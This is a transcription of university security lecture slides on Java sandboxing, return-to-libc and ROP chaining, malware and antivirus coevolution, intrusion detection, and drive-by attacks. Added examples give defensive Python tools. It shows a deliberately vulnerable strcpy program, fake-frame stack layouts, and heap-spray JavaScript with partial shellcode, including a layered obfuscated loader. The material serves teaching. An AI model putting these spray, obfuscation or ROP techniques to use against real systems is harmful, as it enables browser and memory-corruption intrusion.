CO 447 | LEC3: SECURE DESIGN PRINCIPLES, JAVA SECURITY, ROP AND ADVANCED EXPLOITS - PowerPoint PPT Presentation

SLIDE 1

CO 447 | LEC3

SECURE DESIGN PRINCIPLES, JAVA SECURITY, ROP AND ADVANCED EXPLOITS

  • Dr. Ben Livshits
SLIDE 2

Java and Native Interactions

  • Possible to compile a bytecode class file to native code
  • JITs are used for performance
  • Java programs can call native methods, typically functions written in C
  • C# and .NET take C/C++ interop very seriously

using System.Runtime.InteropServices;

// C# P/Invoke: managed code calling two C runtime functions exported by msvcrt.dll
class PlatformInvokeTest
{
    [DllImport("msvcrt.dll")]
    public static extern int puts(string c);

    [DllImport("msvcrt.dll")]
    internal static extern int _flushall();

    public static void Main()
    {
        puts("Test");
        _flushall();
    }
}

SLIDE 3

Java Security Mechanisms

  • Sandboxing
      • Run program in restricted environment
      • Analogy: child's sandbox with only safe toys
      • This term refers to features of loader, verifier, interpreter that restrict program
  • Code signing
      • Use cryptography to establish origin of class file
      • This info can be used by security manager
  • Class loader
      • Separate namespaces for separate class loaders
      • Associates protection domain with each class
  • Verifier and JVM run-time tests
      • NO unchecked casts or other type errors
      • NO buffer/array overflows
      • Preserves private, protected visibility levels
  • Security Manager
      • Called by library functions to decide if request is allowed
      • Uses protection domain associated with code, user policy
      • Coming up in a few slides: stack inspection

SLIDE 4

Security Manager

  • Java library functions call Security Manager
  • Security manager object answers at run time
      • Decide if calling code is allowed to do operation
      • Examine protection domain of calling class
          • Signer: organization that signed code before loading
          • Location: URL where the Java classes came from
      • Uses the system policy to decide access permission

SLIDE 5

Sample Security Manager Methods

  checkExec               Checks if the system commands can be executed.
  checkRead               Checks if a file can be read from.
  checkWrite              Checks if a file can be written to.
  checkListen             Checks if a certain network port can be listened to for connections.
  checkConnect            Checks if a network connection can be created.
  checkCreateClassLoader  Checks to prevent the installation of additional ClassLoaders.

SLIDE 6

Stack Inspection

  • Permission depends on
      • Permission of calling method
      • Permission of all methods above it on stack
      • Up to method that is trusted and asserts this trust

  [figure: call stack showing java.io.FileInputStream, method f, method g, method h]
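
Added example, not from the slides: a toy Python model of the stack walk this slide describes. Each frame carries the protection domain its class was loaded into; a permission is granted only if every frame from the library call back to the first frame that asserted trust is granted it by the policy. The domains, the policy table and the frames are constructed for the example.

```python
"""Toy model of JVM stack inspection.

A permission is granted only if every frame on the stack, from the most recent
down to the first frame that asserted privilege, belongs to a protection domain
that the policy grants it. Domains, policy and frames below are constructed."""
from dataclasses import dataclass


@dataclass
class Frame:
    method: str               # executing method, for readability only
    domain: str               # protection domain the method's class was loaded into
    privileged: bool = False  # True if this frame asserted trust (like doPrivileged)


# Constructed policy: which permissions each protection domain is granted.
POLICY = {
    "system": {"file.read", "file.write", "net.connect"},
    "signed-applet": {"file.read"},
    "unsigned-applet": set(),
}


def check_permission(stack, permission, policy=POLICY):
    """Walk the stack from the callee (last element) towards main (first element).

    Every frame visited must be granted `permission`; the walk stops at a
    privileged frame, so callers above it are not consulted."""
    for frame in reversed(stack):
        if permission not in policy.get(frame.domain, set()):
            return False
        if frame.privileged:
            return True
    return True


def demo():
    """Constructed stacks, listed oldest frame first: main() -> helper -> library call."""
    unprivileged = [
        Frame("Applet.main", "unsigned-applet"),
        Frame("Helper.loadConfig", "system"),
        Frame("FileInputStream.open", "system"),
    ]
    # Same stack, but the helper asserted trust before opening the file.
    privileged = [
        Frame("Applet.main", "unsigned-applet"),
        Frame("Helper.loadConfig", "system", privileged=True),
        Frame("FileInputStream.open", "system"),
    ]
    signed = [
        Frame("Applet.main", "signed-applet"),
        Frame("FileInputStream.open", "system"),
    ]
    return {
        "unprivileged_read": check_permission(unprivileged, "file.read"),
        "privileged_read": check_permission(privileged, "file.read"),
        "privileged_write": check_permission(privileged, "file.write"),
        "signed_read": check_permission(signed, "file.read"),
        "signed_connect": check_permission(signed, "net.connect"),
    }


if __name__ == "__main__":
    print(demo())
```

The unprivileged case is the one the slide warns about: the library code is fully trusted, but the applet frame below it is not, so the read is refused unless a trusted frame in between explicitly asserts that trust.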

SLIDE 7

Java: Things Didn't Quite Go According to Plan

SLIDE 8

Analyzing Java Exploits

https://www.abartel.net/static/p/ccs2016-10yearsJavaExploits.pdf

SLIDE 9

Back to Native Code…

  • Buffer overruns: Stack, Heap

SLIDE 10

DEP

  • Hardware-enforced execution prevention technique
  • Breaks the basics of memory exploitation
  • Specifically, stacks and heaps become non-executable or NX
  • So, can't load your shellcode there
  • But… can jump to existing (shell-) code

SLIDE 11

EIP Limitations

  • Return-to-libc
  • Pioneered in 1997
  • EIP returns to an existing function
  • Need control of the stack to place parameters there
  • Typically, the stack is writeable

  [figure: process memory layout: program image, heap, stack, DLL, DLL]

SLIDE 12

DEP and ASLR

Address space layout randomization (ASLR) is a memory-protection process for operating systems (OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.

https://www.zdnet.com/article/microsoft-says-aslr-behavior-in-windows-10-is-a-feature-not-a-bug/
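
Added example, not from the slides: how a defender checks whether a Linux binary opted into the two mitigations discussed on slides 10 and 12. NX is advertised through the PT_GNU_STACK program header (a stack without the PF_X flag), and ASLR can only relocate the image if it was linked position-independent (ET_DYN). The parser reads the ELF64 header and program headers with struct; the sample image it tests is constructed in memory and is not a real binary.

```python
"""Report NX (non-executable stack) and PIE for an ELF64 little-endian image.

Added example; build_sample_elf() constructs a minimal image in memory so the
check can run offline against known answers."""
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 header, 64 bytes
PHDR = struct.Struct("<IIQQQQQQ")          # ELF64 program header, 56 bytes


def elf_mitigations(data: bytes) -> dict:
    """Return {'nx': bool, 'pie': bool} for an ELF64 little-endian image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (_, e_type, _, _, _, e_phoff, _, _, _, e_phentsize, e_phnum,
     _, _, _) = EHDR.unpack_from(data, 0)
    # No PT_GNU_STACK header at all: the traditional Linux loader then treats the
    # stack as executable, so report NX as absent.
    nx = False
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(data, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    # ET_DYN is also what shared libraries use; for an executable it means PIE.
    return {"nx": nx, "pie": e_type == ET_DYN}


def build_sample_elf(nx: bool, pie: bool) -> bytes:
    """Construct a minimal ELF64 image: header, one PT_LOAD and one PT_GNU_STACK."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8  # class 64, LSB, version 1
    ehdr = EHDR.pack(e_ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x1000,
                     EHDR.size, 0, 0, EHDR.size, PHDR.size, 2, 0, 0, 0)
    load = PHDR.pack(PT_LOAD, PF_R | PF_X, 0, 0, 0, 0x1000, 0x1000, 0x1000)
    stack_flags = PF_R | PF_W | (0 if nx else PF_X)
    gnu_stack = PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + load + gnu_stack


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        image = build_sample_elf(nx=True, pie=False)
    print(elf_mitigations(image))
```

Run it with a path to report on a real binary, or without arguments to see the constructed sample. A binary that reports nx=False still has the writeable, executable stack the slide says shellcode needs; one that reports pie=False has a fixed image base, which is what makes return-to-libc addresses predictable.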

SLIDE 13

Return-to-libc for system

https://www.slideshare.net/saumilshah/dive-into-rop

  • It's possible to invoke an arbitrary function simply by placing a fake frame in stack memory
  • It's possible to retain EIP control after the function return
  • Ret2LibC forms the basis of return-oriented programming

SLIDE 14

Function Calls

#include <stdio.h>

/* add() is the function a fake frame will later return into */
void add(int x, int y) {
    int sum;
    sum = x + y;
    printf("%d\n", sum);
}

int main() {
    add(3, 4);
    return 0;
}

  [stack figure: frame for add(), return address from add(), 3, 4; ESP marks the stack top]

SLIDE 15

Overflow the Buffer and Call add()

#include <string.h>

/* Deliberately vulnerable: strcpy() copies s into a 128-byte buffer with no length check */
void overflow(char *s) {
    char buffer[128];
    strcpy(buffer, s);
}

int main(int argc, char *argv[]) {
    if (argc < 2)
        return 1;
    overflow(argv[1]);
    return 0;
}

  [stack figure: buffer, return address from overflow, parameter s]

SLIDE 16

Calls and Returns

Call
  • push return address on the stack
  • set up the stack
      • move ESP ahead
      • push EBP
      • mov ESP to EBP
  • Function return
      • Leave
          • Restore EBP = POP EBP
          • MOV EBP to ESP
      • ret – return control back to the calling function
          • Return address stored earlier on the stack
          • POP EIP

SLIDE 17

Before the RET Instruction

  [stack figure: buffer filled with AAAA AAAA AAAAA …, the A's running past the end of the buffer; ESP]

SLIDE 18

After the RET Instruction

  • To return to add()
      • Insert a fake frame in the buffer
      • Make overflow() return to add(01010101, 02020202)
      • What is the stack layout?

  [stack figure: buffer of AAAA AAAA; ESP; EIP = 0x41414141]

SLIDE 19

Calling add() Through overflow()

  • By carefully crafting a frame
  • We can have a program return to our function of choice
  • We control the parameters
  • We also control where to jump after the return

  [stack figure: buffer (AAAAA …), address of add(), return address from add(), 01010101, 02020202]

SLIDE 20

Before/after RET in overflow() Called

  [two stack figures, before and after the RET in overflow(): buffer (AAAAA …), address of add(), return address from add(), 01010101, 02020202; ESP is marked in both, and EIP is marked after the RET]

SLIDE 21

Chaining Multiple Function Calls

  [stack figure, top to bottom:]
  AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA (buffer)
  address of add()            <- return from overflow() returns to add()
  address of POP/POP/RET      <- add() returns to POP/POP/RET
  01010101                    <- POP
  02020202                    <- POP
  address of add()            <- return to add()
  42424242                    <- EIP = 0x42424242 after add() returns
  03030303
  04050404
  ESP

SLIDE 22

ROP Design Principles

  • Piece together pieces of code
  • Gadgets – primitive operations
  • These are found in existing binaries to dodge DEP
  • Can be the primary binary or the associated shared libraries
  • Every gadget must end with RET (takes us to the next chained gadget)
  • We find gadgets in function epilogues

SLIDE 23

EIP vs. ESP in ROP

Classic EIP code
  • N ops = N instructions
  • EIP increments
  • ESP fluctuates
  • The CPU increments EIP automatically

ROP code
  • N ops = N frames
  • ESP increments
  • EIP fluctuates
  • We control ESP via ret instructions

SLIDE 24

Gadgets Glued Together

https://www.slideshare.net/saumilshah/dive-into-rop

SLIDE 25

Gadget Dictionary

SLIDE 26

How to Find Gadgets?

  • Disassemble code (binary + DLLs)
  • Identify useful code sequences ending in ret as potential gadgets
  • Assemble gadgets into desired shellcode
  • Return-Oriented Programming: Systems, Languages, and Applications by Ryan Roemer, Erik Buchanan, Hovav Shacham and Stefan Savage
  • Shacham et al. manually identified which sequences ending in ret in libc were useful gadgets
  • Common shellcode was created with these gadgets.
  • Everyone used libc, so gadgets and shellcode were universal

SLIDE 27

Putting This All Together

  • Several gadget compilers exist
  • One example is ROPgadget on GitHub

SLIDE 28

Generating ROP Chains

SLIDE 29

ROPgadget demo

  • https://youtu.be/MSy0rdi1vbo

SLIDE 30

Quiz

  • https://piazza.com/class/k0r3cj25uu0137

SLIDE 31

Malware

SLIDE 32

Malware: Different Types

  • A virus is a computer program that is capable of making copies of itself and inserting those copies into other programs.
  • A worm is a virus that uses a network to copy itself onto other computers.
  • Spyware is software that aids in gathering information about a person or organization without their knowledge and that may send such information to another entity.
  • A Trojan often acts as a backdoor, contacting a controller which can then have unauthorized access to the affected computer.
  • A drive-by-download attack is a malware delivery technique triggered when the user visits a website.

SLIDE 33

Wait, There's More

SLIDE 34

Malware Volume

The AV-TEST Institute registers over 450,000 new malicious programs every day

http://www.av-test.org/en/statistics/malware/

SLIDE 35

A Lot of Commercial Activity

Cyber Security Market worth $155.74 Billion by 2019

http://www.marketsandmarkets.com/PressReleases/cyber-security.asp

SLIDE 36

What is a Virus?

"a program that can infect other programs by modifying them to include a, possibly evolved, version of itself"

Fred Cohen, 1983

SLIDE 37

Brief History of Malware

Mac users can often be heard to say "I don't need antivirus software, I have an Apple". Unfortunately, this is a misguided conclusion. Whilst the dangers are certainly much less than with Windows computers, they do exist nonetheless. Mac users who think they do not need to concern themselves have created an illusion. The claim that Apple users are less threatened than Windows users is currently still correct, but could change rapidly. It was the low market share of Macs that limited the attentions of online criminals; now that Macs are becoming more popular, this state of affairs is changing.

http://www.itsecuritywatch.com/

SLIDE 38

Coevolution: Basic Setup

Virus
  • Wait for user to execute an infected file
  • Infect other (binary) files by modifying them
  • Spread that way

Antivirus
  • Identify a sequence of instructions or data
  • Formulate a signature
  • Scan all files
  • Look for signature found verbatim
  • Bottleneck: scanning speed

SLIDE 39

Signatures

SLIDE 40

Signatures Are Updated All The Time

SLIDE 41

Coevolution: Entry Point Scanning

Virus
  • Place virus at the entry point or make it directly reachable from the entry point
  • Make virus small to avoid being easily noticed by user

Antivirus
  • Entry point scanning
  • Do exploration of reachable instructions starting with the entry point of the program
  • Continue until no more instructions are found

SLIDE 42

Coevolution: Virus Encryption

Virus
  • Decryption routine
  • Virus body
  • Decrypt into memory, not to disk
  • Set PC to the beginning of the decryption buffer
  • Encrypt with a different key before adding virus to new executable

Antivirus
  • Decryption (and encryption) routines (packers) used by viruses are easy to fingerprint
  • Develop signatures to match these routines
  • Attempt to decrypt the virus body to perform a secondary verification (x-raying)

  [figure: infected executable laid out as the decryption routine (D) followed by the encrypted virus body (E)]
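
Added example covering slides 38 and 42 together, not from the slides: a verbatim signature scanner and its x-ray extension in Python. The signature, the host file, the "decryptor" stub and the single-byte XOR that stands in for the virus's encryption routine are all constructed stand-ins. The x-ray step does not try every key over the whole file; it derives the one key that could map the first signature byte onto each file position and verifies the rest of the signature under it, which is the known-plaintext idea behind x-raying.

```python
"""Signature scanning and x-raying over a byte buffer (constructed example)."""

# Constructed signature table: name -> bytes expected verbatim in an infected file.
SIGNATURES = {
    "demo-virus-A": b"\xeb\x1f\x5e\x89\x76\x08",
}


def scan_verbatim(data: bytes, signatures=SIGNATURES):
    """Plain scan: every (name, offset) where a signature occurs literally."""
    hits = []
    for name, sig in signatures.items():
        start = 0
        while (pos := data.find(sig, start)) != -1:
            hits.append((name, pos))
            start = pos + 1
    return hits


def xray_scan(data: bytes, signatures=SIGNATURES):
    """X-ray: find a body encrypted under an unknown single-byte XOR key.

    At each position the only key that could work is data[pos] ^ sig[0];
    check the remaining signature bytes under that key."""
    hits = []
    for name, sig in signatures.items():
        for pos in range(len(data) - len(sig) + 1):
            key = data[pos] ^ sig[0]
            if key == 0:
                continue  # the unencrypted case is scan_verbatim's job
            if all(data[pos + i] ^ key == sig[i] for i in range(len(sig))):
                hits.append((name, key, pos))
    return hits


def xor_bytes(body: bytes, key: int) -> bytes:
    """The toy 'encryption routine': single-byte XOR (constructed stand-in)."""
    return bytes(b ^ key for b in body)


def build_infected_sample(key: int) -> bytes:
    """Constructed host file: benign bytes, a decryptor stub, then the encrypted body."""
    host = b"MZ" + b"\x90" * 30                                  # 32 bytes
    decryptor = b"\x31\xc9\xb1" + bytes([key]) + b"\xeb\x02"     # 6 bytes, not real code
    body = b"\x55\x89\xe5" + SIGNATURES["demo-virus-A"] + b"\xc3"
    return host + decryptor + xor_bytes(body, key)


if __name__ == "__main__":
    sample = build_infected_sample(0x5A)
    print("verbatim:", scan_verbatim(sample))   # nothing: the body is encrypted
    print("x-ray:   ", xray_scan(sample))        # recovers the key and the body offset
```

The slide's point about packers being easy to fingerprint shows up in build_infected_sample: the constructed decryptor stub is identical for every key, so a signature on the stub alone would fire, and the x-ray pass then confirms which virus body sits behind it.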

SLIDE 43

Simple Decryption Routine

SLIDE 44

Jumping Ahead: Similar Behavior in JavaScript

SLIDE 45

Coevolution: Polymorphic

Virus
  • Use a mutation engine to generate a (decryption routine, encryption routine) pair
  • Functionally similar or the same, but syntactically very different
  • Use the encryption routine to encode the body of the virus
  • No fixed part of the virus preserved (decryption, encryption, body)
  • Custom detection program designed to recognize specific detection engines

Antivirus
  • Generic decryption (GD)
      • Emulator
      • Signature matching engine
      • Scan memory/disk at regular intervals in hopes of finding decoded virus body

  [figure: two infections of the same virus with differing decryptor/body pairs, labelled D1, E1 and D2, E2]

SLIDE 46

Emulation Challenges

  • How long to emulate the execution? Viruses use padding instructions to delay execution. Can also sleep for a while to slow down the scanner.
  • What is the quality of the emulator? How many CPUs to support?
  • What if decryption starts upon user interactions? How do we trigger it?
  • What about anti-emulation tricks?

SLIDE 47

AV: Static and Runtime

  • Signature-based virus detection – static techniques
  • Emulation-based detection – runtime technique
  • Generally, both are used at the same time (hybrid)

SLIDE 48

False Positives

  • A "false positive" is when antivirus software identifies a non-malicious file as a virus. When this happens, it can cause serious problems.
  • For example, if an antivirus program is configured to immediately delete or quarantine infected files, a false positive in an essential file can render the operating system or some applications unusable.
      • In May 2007, a faulty virus signature issued by Symantec mistakenly removed essential operating system files, leaving thousands of PCs unable to boot.
      • Also in May 2007, the executable file required by Pegasus Mail was falsely detected by Norton AntiVirus as being a Trojan and it was automatically removed, preventing Pegasus Mail from running. Norton AntiVirus had falsely identified three releases of Pegasus Mail as malware, and would delete the Pegasus Mail installer file when that happened. In response to this Pegasus Mail stated:
      • "On the basis that Norton/Symantec has done this for every one of the last three releases of Pegasus Mail, we can only condemn this product as too flawed to use, and recommend in the strongest terms that our users cease using it in favor of alternative, less buggy anti-virus packages."

SLIDE 49

More False Positives

  • In April 2010, McAfee VirusScan detected svchost.exe, a normal Windows binary, as a virus on machines running Windows XP with Service Pack 3, causing a reboot loop and loss of all network access.
  • In December 2010, a faulty update on the AVG anti-virus suite damaged 64-bit versions of Windows 7, rendering it unable to boot, due to an endless boot loop created.
  • In October 2011, Microsoft Security Essentials removed the Google Chrome browser, rival to Microsoft's own Internet Explorer. MSE flagged Chrome as a Zbot banking trojan.

SLIDE 50

False Alarms

SLIDE 51

Vulnerability Gap

  • As long as the user has the right virus signatures and the computer has recently been scanned, detection will likely work
  • But the virus landscape changes fast
  • This calls for monitoring techniques for unknown viruses

http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_vulnerability_report.pdf

SLIDE 52

Limitations of AV

  • The reactive approach renders existing security solutions less effective, because they are too slow to respond and require up-to-date signatures before they can be effective
  • While the reactive signature approach provides adequate identification of existing attacks, it is virtually useless in protecting against new and unknown attacks

SLIDE 53

Malwarebytes: Not Signature-Based

https://www.youtube.com/watch?v=PGLGyPuxP7c

SLIDE 54

IDS: Intrusion Detection Systems

  • Collect signals
  • Build a model of normal (and abnormal) behavior
  • Process logs and create alerts
  • Notify system operators
  • Behavioral models can be quite complex
  • Are often graph-based
  • Or regex-based
  • Influence false positive and false negative rates

SLIDE 55

Host-Based vs. Network-Based IDS

Host-based
  • Log analyzers
  • Signature-based sensors
  • System call analyzers
  • Application behavior analyzers
  • File integrity checkers

Network-based
  • Scan incoming and outgoing traffic
  • Primarily signature-based
  • Combined into firewalls
  • Can be located on a different machine

SLIDE 56

System Call Log

11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] mmap
11:33:27;[pid 1286] close
11:33:27;[pid 1286] close
11:33:27;[pid 1286] munmap
11:33:27;[pid 1286] open
11:33:27;[pid 1286] ioctl
11:33:27;[pid 1286] close
11:33:27;[pid 1286] nice
11:33:27;[pid 1286] auditon
11:33:27;[pid 1286] open
11:33:27;[pid 1286] ioctl
11:33:27;[pid 1286] close
11:33:27;[pid 1286] open
11:33:27;[pid 1286] ioctl

SLIDE 57

Registry Access Log

SLIDE 58

Host-Based Intrusion Detection

  [figure: statically inferred model with states Entry(f), Entry(g), Exit(f), Exit(g) and transitions on the system calls open(), close(), exit(), getuid(), geteuid()]

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* The system calls each function can issue are what the static model records */
void f(int x) {
    x ? getuid() : geteuid();
    x++;
}

void g(void) {
    int fd = open("foo", O_RDONLY);
    f(0);
    close(fd);
    f(1);
    exit(0);
}

If the observed code behavior is inconsistent with the statically inferred model, something is wrong
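
Added example, not from the slides: the model on this slide written out as a finite automaton in Python, with the Entry(f)/Exit(f) edges as epsilon transitions, and an online consistency check over observed system call traces (all constructed). Because Exit(f) can return to either call site, the automaton also accepts a few interleavings the real program cannot produce; the test documents one such case.

```python
"""The f()/g() model from this slide as an NFA, plus an online consistency check.

Added example. Transitions: state -> [(label, next_state)]. A label of None is
an Entry/Exit edge (epsilon); any other label is the system call observed."""

MODEL = {
    "g0": [("open", "g1")],
    "g1": [(None, "f0")],                  # Entry(f) for the call f(0)
    "g2": [("close", "g3")],
    "g3": [(None, "f0")],                  # Entry(f) for the call f(1)
    "g4": [("exit", "g5")],
    "g5": [],
    "f0": [("getuid", "f1"), ("geteuid", "f1")],
    "f1": [(None, "g2"), (None, "g4")],    # Exit(f): the NFA cannot tell which call site to return to
}
START = "g0"


def epsilon_closure(states, model=MODEL):
    """All states reachable from `states` through Entry/Exit edges only."""
    stack, seen = list(states), set(states)
    while stack:
        s = stack.pop()
        for label, nxt in model[s]:
            if label is None and nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def consistent(trace, model=MODEL):
    """True if some path through the model can produce the calls observed so far.

    Used as an online monitor: the first False is the moment to raise an alert."""
    current = epsilon_closure({START}, model)
    for call in trace:
        current = epsilon_closure(
            {nxt for s in current for label, nxt in model[s] if label == call}, model)
        if not current:
            return False
    return True


def demo():
    return {
        "normal_run": consistent(["open", "getuid", "close", "geteuid", "exit"]),
        "close_before_f": consistent(["open", "close"]),            # g() never does this
        "double_getuid": consistent(["open", "getuid", "getuid"]),  # f() issues one call
        "skipped_close": consistent(["open", "getuid", "exit"]),    # accepted only through NFA imprecision
    }


if __name__ == "__main__":
    print(demo())
```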

SLIDE 59

Drive-by malware

SLIDE 60

Brief History of Memory-Based Exploits

Memory-based exploits
  • 2000: Stack-based overruns
  • 2002: Heap-based overruns
  • 2005: Drive-by attacks and heap sprays

  • 1999: Melissa
  • 2001: CodeRed
  • 2002: Nimda

SLIDE 61

What is a Drive-By Attack?

0wned!

SLIDE 62

Drive-By Attack Example: Heap Spraying

<SCRIPT language="text/javascript">
shellcode = unescape("%u4343%u4343%...");
oneblock = unescape("%u0C0C%u0C0C");
var fullblock = oneblock;
while (fullblock.length < 0x40000) {
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i = 0; i < 1000; i++) {
    sprayContainer[i] = fullblock + shellcode;
}
</SCRIPT>

  [figure: browser heap holding a few "ok" objects among many "bad" ones; caption: Allocate 1,000s of malicious objects]

SLIDE 63

Heap Spraying

Firefox 3.5, July 14, 2009
http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html

Adobe Acrobat / Reader, February 19, 2009
http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html

SLIDE 64

More Complex Malware

SLIDE 65

Drive-by downloads: this is one of the key reasons why browser vulnerabilities are so valuable

SLIDE 66

SLIDE 67

Aspects of Drive-By Malware

  • Attacks
      • Browser
      • What is mostly affected?
      • Browser plugins
      • What is affected in plugins? Why are plugins most open to exploitation?
  • Vulnerabilities
      • Dangling pointers
      • Double frees
      • Buffer overruns are harder
  • Malware is highly obfuscated
  • Obfuscation changes all the time

SLIDE 68

Obfuscation

Layer 1: string fragments concatenated and passed to eval()

OlOlll="(x)"; OllOlO=" String"; OlllOO="tion"; OlOllO="Code(x)}"; OllOOO="Char";
OlllOl="func"; OllllO=" l = "; OllOOl=".from"; OllOll="{return"; Olllll="var";
eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);

which evaluates to:

var l = function(x) { return String.fromCharCode(x); }

Layer 2: the decoder l() builds a second decoder O()

eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125));

which evaluates to:

var O = function(m){ return String.fromCharCode( Math.floor(m / 10000) / 2); }

Layer 3: O() decodes the heap-spray payload

eval(""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...);

which evaluates to:

shellcode = unescape("%u54EB%u758B…");
var bigblock = unescape("%u0c0c%u0c0c");
while (bigblock.length < slackspace) { bigblock += bigblock; }
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) { block = block + block + fillblock; }
memory = new Array();
for (x = 0; x < 300; x++) { memory[x] = block + shellcode; …

SLIDE 69

More Obfuscated Code

SLIDE 70

Malzilla

SLIDE 71

Malzilla (2)

SLIDE 72

Decoders

SLIDE 73

Disassemble?

SLIDE 74

And More

SLIDE 75

Runtime Deobfuscation via Code Unfolding

eval(""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...);

JavaScript runtime in browser

Deobfuscator

  [figure: the eval(""+O(…)+…) call above shown repeated many times, flowing from the JavaScript runtime in browser to the Deobfuscator]

slide-76
SLIDE 76

Malicious PDFs


http://sandsprite.com/blogs/index.php?uid=7&pid=57

slide-77
SLIDE 77

Unpacking It Some More


slide-78
SLIDE 78

Detection Approaches

¨ Static analysis of JavaScript?
¨ What are the challenges?
¨ Observe execution
¨ Watch in-browser behavior
¨ Watch OS effects
¨ Run in a VM

slide-79
SLIDE 79

How to Recognize JavaScript Malware?

  • 1. Look at representative malware
  • 2. Find commonalities
  • 3. Encode them as features

slide-80
SLIDE 80

See Anything in Common

var MuqEZYdx = "%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…";  // shellcode, %u-encoded (truncated on the slide)
var avIztsbF = "%u0C0C%u0C0C";        // sled unit; 0x0C0C0C0C doubles as the address the exploit will jump to
var TzsygYnD = "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA";
var eSSOLKOd = unescape(MuqEZYdx);    // decode the shellcode into a JS string
var pbIkPrKa = new Array();           // holds the sprayed blocks so they are not collected
var wSqaQK = 1000;
var xASdnqwj = 0x100000;              // 1 MB per sprayed block
var xAFKNqwO = 2;                     // bytes per UTF-16 character
var oQkmsLLP = 0x01020;               // string object overhead, subtracted so each block fills exactly 1 MB
var EibcUrHC = xASdnqwj - (eSSOLKOd.length * xAFKNqwO + oQkmsLLP);
var cTAfWBbz = unescape(avIztsbF);
var oKqMlPqL = 0xC0;                  // 192 blocks, i.e. 192 MB of spray
